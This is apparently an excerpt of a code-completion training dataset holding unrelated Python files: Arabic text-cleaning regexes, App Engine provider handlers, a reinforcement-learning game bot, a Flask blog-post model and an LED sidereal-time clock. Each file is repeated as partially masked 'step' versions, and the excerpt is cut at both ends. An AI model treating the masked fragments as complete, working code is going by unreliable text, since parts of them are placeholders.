r\"\\S+@\\S+\"]\nredundant_punct_pattern = (\n r\"([!\\\"#\\$%\\'\\(\\)\\*\\+,\\.:;\\-<=·>?@\\[\\\\\\]\\^_ـ`{\\|}~—٪’،؟`୍“؛”ۚ【»؛\\s+«–…‘]{2,})\"\n)\nregex_tatweel = r\"(\\D)\\1{2,}\"\nrejected_chars_regex = r\"[^0-9\\u0621-\\u063A\\u0640-\\u066C\\u0671-\\u0674a-zA-Z\\[\\]!\\\"#\\$%\\'\\(\\)\\*\\+,\\.:;\\-<=·>?@\\[\\\\\\]\\^_ـ`{\\|}~—٪’،؟`୍“؛”ۚ»؛\\s+«–…‘]\"\n\nregex_url_step1 = r\"(?=http)[^\\s]+\"\nregex_url_step2 = r\"(?=www)[^\\s]+\"\nregex_url = r\"(http(s)?:\\/\\/.)?(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{2,256}\\.[a-z]{2,6}\\b([-a-zA-Z0-9@:%_\\+.~#?&//=]*)\"\nregex_mention = r\"@[\\w\\d]+\"\nregex_email = r\"\\S+@\\S+\"\n\nchars_regex = r\"0-9\\u0621-\\u063A\\u0640-\\u066C\\u0671-\\u0674a-zA-Z\\[\\]!\\\"#\\$%\\'\\(\\)\\*\\+,\\.:;\\-<=·>?@\\[\\\\\\]\\^_ـ`{\\|}~—٪’،؟`୍“؛”ۚ»؛\\s+«–…‘\"\n\nwhite_spaced_double_quotation_regex = r'\\\"\\s+([^\"]+)\\s+\\\"'\nwhite_spaced_single_quotation_regex = r\"\\'\\s+([^']+)\\s+\\'\"\nwhite_spaced_back_quotation_regex = r\"\\`\\s+([^`]+)\\s+\\`\"\nwhite_spaced_em_dash = r\"\\—\\s+([^—]+)\\s+\\—\"\n\nleft_spaced_chars = r\" ([\\]!#\\$%\\),\\.:;\\?}٪’،؟”؛…»·])\"\nright_spaced_chars = r\"([\\[\\(\\{“«‘*\\~]) \"\nleft_and_right_spaced_chars = r\" ([\\+\\-\\<\\=\\>\\@\\\\\\^\\_\\|\\–]) \"\n",
"step-ids": [
12,
13,
14,
15,
16
]
}
|
[
12,
13,
14,
15,
16
] |
from handler.auth import provider_required
from handler.provider import ProviderBaseHandler
from forms.provider import ProviderAddressForm, ProviderVanityURLForm
import logging
from data import db
from util import saved_message
class ProviderEditAddressHandler(ProviderBaseHandler):
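    # GET pre-fills the address and vanity URL forms from the stored provider; POST validates and saves the address, then logs success or a validation error.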
@provider_required
def get(self, vanity_url=None):
provider = db.get_provider_from_vanity_url(vanity_url)
logging.info("provider dump before edit:" + str(vars(provider)))
address_form = ProviderAddressForm().get_form(obj=provider)
vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)
self.render_address(provider, address_form=address_form, vanity_url_form=vanity_url_form)
@provider_required
def post(self, vanity_url=None):
form = ProviderAddressForm().get_form(self.request.POST)
if form.validate():
# Store Provider
provider = db.get_provider_from_vanity_url(vanity_url)
form.populate_obj(provider)
provider.put()
vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)
self.render_address(provider, address_form=form, vanity_url_form=vanity_url_form, success_message=saved_message)
# log the event
self.log_event(user=provider.user, msg="Edit Address: Success")
else:
# show validation error
provider = db.get_provider_from_vanity_url(vanity_url)
vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)
self.render_address(provider, address_form=form, vanity_url_form=vanity_url_form)
# log the event
self.log_event(user=provider.user, msg="Edit Address: Validation Error")
class ProviderChangeURLHandler(ProviderBaseHandler):
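    # POST saves a new vanity URL and redirects to the provider's address page; validation errors re-render the address view and are logged.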
@provider_required
def post(self, vanity_url=None):
form = ProviderVanityURLForm().get_form(self.request.POST)
if form.validate():
# Store Provider
provider = db.get_provider_from_vanity_url(vanity_url)
form.populate_obj(provider)
provider.put()
self.redirect('/provider/address/' + provider.vanity_url)
# log the event
self.log_event(user=provider.user, msg="Edit Address: Success")
else:
# show validation error
provider = db.get_provider_from_vanity_url(vanity_url)
address_form = ProviderAddressForm().get_form(obj=provider)
self.render_address(provider, address_form=address_form, vanity_url_form=form)
# log the event
self.log_event(user=provider.user, msg="Edit Address: Validation Error")
|
normal
|
{
"blob_id": "454f885e2254295ce6508e70c0348f5cbe855520",
"index": 5071,
"step-1": "<mask token>\n\n\nclass ProviderEditAddressHandler(ProviderBaseHandler):\n <mask token>\n <mask token>\n\n\nclass ProviderChangeURLHandler(ProviderBaseHandler):\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderVanityURLForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n self.redirect('/provider/address/' + provider.vanity_url)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n address_form = ProviderAddressForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n",
"step-2": "<mask token>\n\n\nclass ProviderEditAddressHandler(ProviderBaseHandler):\n\n @provider_required\n def get(self, vanity_url=None):\n provider = db.get_provider_from_vanity_url(vanity_url)\n logging.info('provider dump before edit:' + str(vars(provider)))\n address_form = ProviderAddressForm().get_form(obj=provider)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=vanity_url_form)\n <mask token>\n\n\nclass ProviderChangeURLHandler(ProviderBaseHandler):\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderVanityURLForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n self.redirect('/provider/address/' + provider.vanity_url)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n address_form = ProviderAddressForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n",
"step-3": "<mask token>\n\n\nclass ProviderEditAddressHandler(ProviderBaseHandler):\n\n @provider_required\n def get(self, vanity_url=None):\n provider = db.get_provider_from_vanity_url(vanity_url)\n logging.info('provider dump before edit:' + str(vars(provider)))\n address_form = ProviderAddressForm().get_form(obj=provider)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=vanity_url_form)\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderAddressForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=form,\n vanity_url_form=vanity_url_form, success_message=saved_message)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=form,\n vanity_url_form=vanity_url_form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n\n\nclass ProviderChangeURLHandler(ProviderBaseHandler):\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderVanityURLForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n self.redirect('/provider/address/' + provider.vanity_url)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n address_form = ProviderAddressForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n",
"step-4": "from handler.auth import provider_required\nfrom handler.provider import ProviderBaseHandler\nfrom forms.provider import ProviderAddressForm, ProviderVanityURLForm\nimport logging\nfrom data import db\nfrom util import saved_message\n\n\nclass ProviderEditAddressHandler(ProviderBaseHandler):\n\n @provider_required\n def get(self, vanity_url=None):\n provider = db.get_provider_from_vanity_url(vanity_url)\n logging.info('provider dump before edit:' + str(vars(provider)))\n address_form = ProviderAddressForm().get_form(obj=provider)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=vanity_url_form)\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderAddressForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=form,\n vanity_url_form=vanity_url_form, success_message=saved_message)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n self.render_address(provider, address_form=form,\n vanity_url_form=vanity_url_form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n\n\nclass ProviderChangeURLHandler(ProviderBaseHandler):\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderVanityURLForm().get_form(self.request.POST)\n if form.validate():\n provider = db.get_provider_from_vanity_url(vanity_url)\n form.populate_obj(provider)\n provider.put()\n self.redirect('/provider/address/' + provider.vanity_url)\n self.log_event(user=provider.user, msg='Edit Address: Success')\n else:\n provider = db.get_provider_from_vanity_url(vanity_url)\n address_form = ProviderAddressForm().get_form(obj=provider)\n self.render_address(provider, address_form=address_form,\n vanity_url_form=form)\n self.log_event(user=provider.user, msg=\n 'Edit Address: Validation Error')\n",
"step-5": "from handler.auth import provider_required\nfrom handler.provider import ProviderBaseHandler\nfrom forms.provider import ProviderAddressForm, ProviderVanityURLForm\nimport logging\nfrom data import db\nfrom util import saved_message\n\nclass ProviderEditAddressHandler(ProviderBaseHandler):\n @provider_required\n def get(self, vanity_url=None):\n provider = db.get_provider_from_vanity_url(vanity_url)\n logging.info(\"provider dump before edit:\" + str(vars(provider)))\n address_form = ProviderAddressForm().get_form(obj=provider)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n\n self.render_address(provider, address_form=address_form, vanity_url_form=vanity_url_form)\n\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderAddressForm().get_form(self.request.POST)\n \n if form.validate():\n # Store Provider\n provider = db.get_provider_from_vanity_url(vanity_url)\n \n form.populate_obj(provider)\n provider.put()\n\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n\n self.render_address(provider, address_form=form, vanity_url_form=vanity_url_form, success_message=saved_message)\n\n # log the event\n self.log_event(user=provider.user, msg=\"Edit Address: Success\")\n\n else:\n # show validation error\n provider = db.get_provider_from_vanity_url(vanity_url)\n vanity_url_form = ProviderVanityURLForm().get_form(obj=provider)\n\n self.render_address(provider, address_form=form, vanity_url_form=vanity_url_form)\n \n # log the event\n self.log_event(user=provider.user, msg=\"Edit Address: Validation Error\")\n\n\n\n \n\n\nclass ProviderChangeURLHandler(ProviderBaseHandler):\n @provider_required\n def post(self, vanity_url=None):\n form = ProviderVanityURLForm().get_form(self.request.POST)\n \n if form.validate():\n # Store Provider\n provider = db.get_provider_from_vanity_url(vanity_url)\n \n form.populate_obj(provider)\n \n provider.put()\n\n self.redirect('/provider/address/' + provider.vanity_url)\n\n # log the event\n self.log_event(user=provider.user, msg=\"Edit Address: Success\")\n\n else:\n # show validation error\n provider = db.get_provider_from_vanity_url(vanity_url)\n address_form = ProviderAddressForm().get_form(obj=provider)\n\n self.render_address(provider, address_form=address_form, vanity_url_form=form)\n \n # log the event\n self.log_event(user=provider.user, msg=\"Edit Address: Validation Error\")\n\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import numpy as np
import json
import random
from encapsulate_state import StateEncapsulator
from scalar_to_action import ActionMapper
import pickle
from basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP
import matplotlib.pyplot as plt
STATE_FILENAME = "state3.json"
CONFIG_FILENAME = "bot.json"
WEIGHTS_FILENAME = "weights.pkl"
DO_NOTHING_ACTION = [-1, -1, -1]
class LinearBot(object):
def __init__(self, player, player_name, weights_file, basis):
self.reader = StateEncapsulator(player, player_name)
with open(STATE_FILENAME, "r") as f:
data = json.load(f)
self.state = self.reader.parse_state(data)
with open(weights_file, "rb") as pkl:
self.weights = pickle.load(pkl)
self.action_mapper = ActionMapper()
self.basis = basis
self.command = ""
		# Expects the state as an un-flattened 3D tensor; returns the chosen action as a list
def __get_next_action(self, sp):
sp = sp.flatten()
q_values = []
for action in self.action_mapper.triples:
sp_ap = np.array(list(sp) + list(action))
sp_ap = self.basis(sp_ap)
q_values.append(np.dot(sp_ap, self.weights))
return list(self.action_mapper.triples[np.argmax(q_values)])
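		# Writes the selected action to command.txt in "x,y,action" form; the file stays empty when the best choice is to do nothing.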
def write_action(self):
action_list = self.__get_next_action(self.state)
if (not np.all(action_list == DO_NOTHING_ACTION)) and action_list[2] != -1:
self.command = str(action_list[0]) + "," + str(action_list[1]) + "," + str(action_list[2])
with open("command.txt", "w") as outfl:
outfl.write(self.command)
############################################################################################
if __name__ == "__main__":
with open(CONFIG_FILENAME, "r") as f:
data = json.load(f)
player_name = data["nickName"]
player = "A" if player_name == "Guido" else "B"
bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)
bot.write_action()
|
normal
|
{
"blob_id": "e9a6baf10efc5b6bd07af1fe352b0b17ecc172bd",
"index": 1855,
"step-1": "<mask token>\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n <mask token>\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-3": "<mask token>\nSTATE_FILENAME = 'state3.json'\nCONFIG_FILENAME = 'bot.json'\nWEIGHTS_FILENAME = 'weights.pkl'\nDO_NOTHING_ACTION = [-1, -1, -1]\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-4": "import numpy as np\nimport json\nimport random\nfrom encapsulate_state import StateEncapsulator\nfrom scalar_to_action import ActionMapper\nimport pickle\nfrom basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP\nimport matplotlib.pyplot as plt\nSTATE_FILENAME = 'state3.json'\nCONFIG_FILENAME = 'bot.json'\nWEIGHTS_FILENAME = 'weights.pkl'\nDO_NOTHING_ACTION = [-1, -1, -1]\n\n\nclass LinearBot(object):\n\n def __init__(self, player, player_name, weights_file, basis):\n self.reader = StateEncapsulator(player, player_name)\n with open(STATE_FILENAME, 'r') as f:\n data = json.load(f)\n self.state = self.reader.parse_state(data)\n with open(weights_file, 'rb') as pkl:\n self.weights = pickle.load(pkl)\n self.action_mapper = ActionMapper()\n self.basis = basis\n self.command = ''\n\n def __get_next_action(self, sp):\n sp = sp.flatten()\n q_values = []\n for action in self.action_mapper.triples:\n sp_ap = np.array(list(sp) + list(action))\n sp_ap = self.basis(sp_ap)\n q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-5": "import numpy as np \nimport json \nimport random\nfrom encapsulate_state import StateEncapsulator\nfrom scalar_to_action import ActionMapper\nimport pickle\nfrom basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP\nimport matplotlib.pyplot as plt\n\nSTATE_FILENAME = \"state3.json\"\nCONFIG_FILENAME = \"bot.json\"\nWEIGHTS_FILENAME = \"weights.pkl\"\nDO_NOTHING_ACTION = [-1, -1, -1]\n\nclass LinearBot(object):\n\t\tdef __init__(self, player, player_name, weights_file, basis):\n\t\t\tself.reader = StateEncapsulator(player, player_name)\n\n\t\t\twith open(STATE_FILENAME, \"r\") as f:\n\t\t\t\tdata = json.load(f)\n\t\t\tself.state = self.reader.parse_state(data)\n\n\t\t\twith open(weights_file, \"rb\") as pkl:\n\t\t\t\tself.weights = pickle.load(pkl)\n\n\t\t\tself.action_mapper = ActionMapper()\n\t\t\tself.basis = basis\n\t\t\tself.command = \"\"\n\n\t\t# Expects as input a 3D tensor representing the state, un-flattened; returns a list action\n\t\tdef __get_next_action(self, sp):\n\t\t\tsp = sp.flatten()\n\t\t\tq_values = []\n\t\t\tfor action in self.action_mapper.triples:\n\t\t\t\tsp_ap = np.array(list(sp) + list(action))\n\t\t\t\tsp_ap = self.basis(sp_ap)\n\t\t\t\tq_values.append(np.dot(sp_ap, self.weights))\n\n\t\t\treturn list(self.action_mapper.triples[np.argmax(q_values)])\n\n\t\tdef write_action(self):\n\t\t\taction_list = self.__get_next_action(self.state)\n\t\t\tif (not np.all(action_list == DO_NOTHING_ACTION)) and action_list[2] != -1:\n\t\t\t\tself.command = str(action_list[0]) + \",\" + str(action_list[1]) + \",\" + str(action_list[2])\n\t\t\twith open(\"command.txt\", \"w\") as outfl:\n\t\t\t\toutfl.write(self.command)\n\n############################################################################################\n\nif __name__ == \"__main__\":\n\twith open(CONFIG_FILENAME, \"r\") as f:\n\t\tdata = json.load(f)\n\t\tplayer_name = data[\"nickName\"]\n\t\tplayer = \"A\" if player_name == \"Guido\" else \"B\"\n\n\tbot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n\tbot.write_action()\n\t",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
from app import db
from datetime import datetime
from sqlalchemy.orm import validates
class Posts(db.Model):
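    # Blog post model; the validators below enforce minimum field lengths and restrict status to Publish/Draft/Thrash.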
id = db.Column(db.BigInteger, primary_key=True, autoincrement=True)
title = db.Column(db.String(200))
content = db.Column(db.Text)
category = db.Column(db.String(100))
created_date = db.Column(db.DateTime, default=datetime.utcnow)
updated_date = db.Column(db.DateTime, default=datetime.utcnow)
status = db.Column(db.Enum('Publish', 'Draft', 'Thrash', name='postsStatus'), default='Draft')
def __repr__(self):
return '<Posts {}>'.format(self.name)
@validates("title")
def validate_title(self, key, title):
if not title:
raise AssertionError("Title is required")
if len(title) < 20:
raise AssertionError("Title must be at least 20 character")
return title
@validates("content")
def validate_content(self, key, content):
if not content:
raise AssertionError("Content is required")
if len(content) < 200:
raise AssertionError("Content must be at least 200 character")
return content
@validates("category")
def validate_category(self, key, category):
if not category:
raise AssertionError("Category is required")
if len(category) < 3:
raise AssertionError("Category must be at least 3 character")
return category
@validates("status")
def validate_status(self, key, status):
if not status:
raise AssertionError("Status is required")
elif status not in ['Publish', 'Draft', 'Thrash']:
raise AssertionError("{} is not supported status".format(status))
return status
|
normal
|
{
"blob_id": "29298ee7ddb4e524a23000abf86854d72f49954c",
"index": 1850,
"step-1": "<mask token>\n\n\nclass Posts(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Posts {}>'.format(self.name)\n\n @validates('title')\n def validate_title(self, key, title):\n if not title:\n raise AssertionError('Title is required')\n if len(title) < 20:\n raise AssertionError('Title must be at least 20 character')\n return title\n\n @validates('content')\n def validate_content(self, key, content):\n if not content:\n raise AssertionError('Content is required')\n if len(content) < 200:\n raise AssertionError('Content must be at least 200 character')\n return content\n\n @validates('category')\n def validate_category(self, key, category):\n if not category:\n raise AssertionError('Category is required')\n if len(category) < 3:\n raise AssertionError('Category must be at least 3 character')\n return category\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Posts(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Posts {}>'.format(self.name)\n\n @validates('title')\n def validate_title(self, key, title):\n if not title:\n raise AssertionError('Title is required')\n if len(title) < 20:\n raise AssertionError('Title must be at least 20 character')\n return title\n\n @validates('content')\n def validate_content(self, key, content):\n if not content:\n raise AssertionError('Content is required')\n if len(content) < 200:\n raise AssertionError('Content must be at least 200 character')\n return content\n\n @validates('category')\n def validate_category(self, key, category):\n if not category:\n raise AssertionError('Category is required')\n if len(category) < 3:\n raise AssertionError('Category must be at least 3 character')\n return category\n\n @validates('status')\n def validate_status(self, key, status):\n if not status:\n raise AssertionError('Status is required')\n elif status not in ['Publish', 'Draft', 'Thrash']:\n raise AssertionError('{} is not supported status'.format(status))\n return status\n",
"step-3": "<mask token>\n\n\nclass Posts(db.Model):\n id = db.Column(db.BigInteger, primary_key=True, autoincrement=True)\n title = db.Column(db.String(200))\n content = db.Column(db.Text)\n category = db.Column(db.String(100))\n created_date = db.Column(db.DateTime, default=datetime.utcnow)\n updated_date = db.Column(db.DateTime, default=datetime.utcnow)\n status = db.Column(db.Enum('Publish', 'Draft', 'Thrash', name=\n 'postsStatus'), default='Draft')\n\n def __repr__(self):\n return '<Posts {}>'.format(self.name)\n\n @validates('title')\n def validate_title(self, key, title):\n if not title:\n raise AssertionError('Title is required')\n if len(title) < 20:\n raise AssertionError('Title must be at least 20 character')\n return title\n\n @validates('content')\n def validate_content(self, key, content):\n if not content:\n raise AssertionError('Content is required')\n if len(content) < 200:\n raise AssertionError('Content must be at least 200 character')\n return content\n\n @validates('category')\n def validate_category(self, key, category):\n if not category:\n raise AssertionError('Category is required')\n if len(category) < 3:\n raise AssertionError('Category must be at least 3 character')\n return category\n\n @validates('status')\n def validate_status(self, key, status):\n if not status:\n raise AssertionError('Status is required')\n elif status not in ['Publish', 'Draft', 'Thrash']:\n raise AssertionError('{} is not supported status'.format(status))\n return status\n",
"step-4": "from app import db\nfrom datetime import datetime\nfrom sqlalchemy.orm import validates\n\n\nclass Posts(db.Model):\n id = db.Column(db.BigInteger, primary_key=True, autoincrement=True)\n title = db.Column(db.String(200))\n content = db.Column(db.Text)\n category = db.Column(db.String(100))\n created_date = db.Column(db.DateTime, default=datetime.utcnow)\n updated_date = db.Column(db.DateTime, default=datetime.utcnow)\n status = db.Column(db.Enum('Publish', 'Draft', 'Thrash', name=\n 'postsStatus'), default='Draft')\n\n def __repr__(self):\n return '<Posts {}>'.format(self.name)\n\n @validates('title')\n def validate_title(self, key, title):\n if not title:\n raise AssertionError('Title is required')\n if len(title) < 20:\n raise AssertionError('Title must be at least 20 character')\n return title\n\n @validates('content')\n def validate_content(self, key, content):\n if not content:\n raise AssertionError('Content is required')\n if len(content) < 200:\n raise AssertionError('Content must be at least 200 character')\n return content\n\n @validates('category')\n def validate_category(self, key, category):\n if not category:\n raise AssertionError('Category is required')\n if len(category) < 3:\n raise AssertionError('Category must be at least 3 character')\n return category\n\n @validates('status')\n def validate_status(self, key, status):\n if not status:\n raise AssertionError('Status is required')\n elif status not in ['Publish', 'Draft', 'Thrash']:\n raise AssertionError('{} is not supported status'.format(status))\n return status\n",
"step-5": "from app import db\nfrom datetime import datetime\nfrom sqlalchemy.orm import validates\n\nclass Posts(db.Model):\n id = db.Column(db.BigInteger, primary_key=True, autoincrement=True)\n title = db.Column(db.String(200))\n content = db.Column(db.Text)\n category = db.Column(db.String(100))\n created_date = db.Column(db.DateTime, default=datetime.utcnow)\n updated_date = db.Column(db.DateTime, default=datetime.utcnow)\n status = db.Column(db.Enum('Publish', 'Draft', 'Thrash', name='postsStatus'), default='Draft')\n \n def __repr__(self):\n return '<Posts {}>'.format(self.name)\n \n @validates(\"title\")\n def validate_title(self, key, title):\n if not title: \n raise AssertionError(\"Title is required\")\n if len(title) < 20:\n raise AssertionError(\"Title must be at least 20 character\")\n return title\n \n @validates(\"content\")\n def validate_content(self, key, content):\n if not content: \n raise AssertionError(\"Content is required\")\n if len(content) < 200:\n raise AssertionError(\"Content must be at least 200 character\")\n return content\n \n @validates(\"category\")\n def validate_category(self, key, category):\n if not category: \n raise AssertionError(\"Category is required\")\n if len(category) < 3:\n raise AssertionError(\"Category must be at least 3 character\")\n return category\n \n @validates(\"status\")\n def validate_status(self, key, status):\n if not status: \n raise AssertionError(\"Status is required\")\n elif status not in ['Publish', 'Draft', 'Thrash']:\n raise AssertionError(\"{} is not supported status\".format(status))\n return status\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import time
import math
from random import randrange
import multilineMAX7219 as LEDMatrix
from multilineMAX7219_fonts import CP437_FONT, SINCLAIRS_FONT, LCD_FONT, TINY_FONT
from multilineMAX7219 import DIR_L, DIR_R, DIR_U, DIR_D
from multilineMAX7219 import DIR_LU, DIR_RU, DIR_LD, DIR_RD
from multilineMAX7219 import DISSOLVE, GFX_ON, GFX_OFF, GFX_INVERT
import datetime,ephem
from myfont import f
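
# Overview: this script shows universal time ("UT") and local sidereal time ("ST")
# for the observer site defined below (by the coordinates and the variable name,
# apparently the GTC on La Palma) on two rows of a chained MAX7219 LED matrix,
# refreshing every 0.1 s until interrupted with Ctrl-C.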
def utlst():
gtc = ephem.Observer()
gtc.lat, gtc.lon, gtc.elevation = '28.7565187', '-17.8919956', 2175.0
t = "%s %s" % (gtc.date,gtc.sidereal_time())
p = t.split(" ")
lst=p[2].split(".")
ut=p[1]
return ut,lst[0]
def at(x,y,string,state=GFX_ON):
for c in string:
LEDMatrix.gfx_sprite_array(f[ord(c)-48],x,y,state)
x+=len(f[ord(c)-48][0])
if c == ":" : x-=7
if c >= "A" : x-=1
# Initialise the library and the MAX7219/8x8LED arrays
LEDMatrix.init()
LEDMatrix.brightness(5)
sun, moon = ephem.Sun(), ephem.Moon()
gtc = ephem.Observer()
gtc.lat, gtc.lon, gtc.elevation = '28.7565187', '-17.8919956', 2175.0
print gtc.date, gtc.sidereal_time()
print gtc.lon, gtc.lat
try:
while 1:
ut,lst=utlst()
sut="%s" % ut
slst="%s" % lst
if len(slst) < 8: slst = "0"+slst
at(0,16,"UT%s" % sut)
at(0, 0,"ST%s" % slst)
LEDMatrix.gfx_render()
time.sleep(0.1)
except KeyboardInterrupt:
# reset array
LEDMatrix.clear_all()
|
normal
|
{
"blob_id": "ba486b64b1da3dc1775bee0980d5236516e130d4",
"index": 4033,
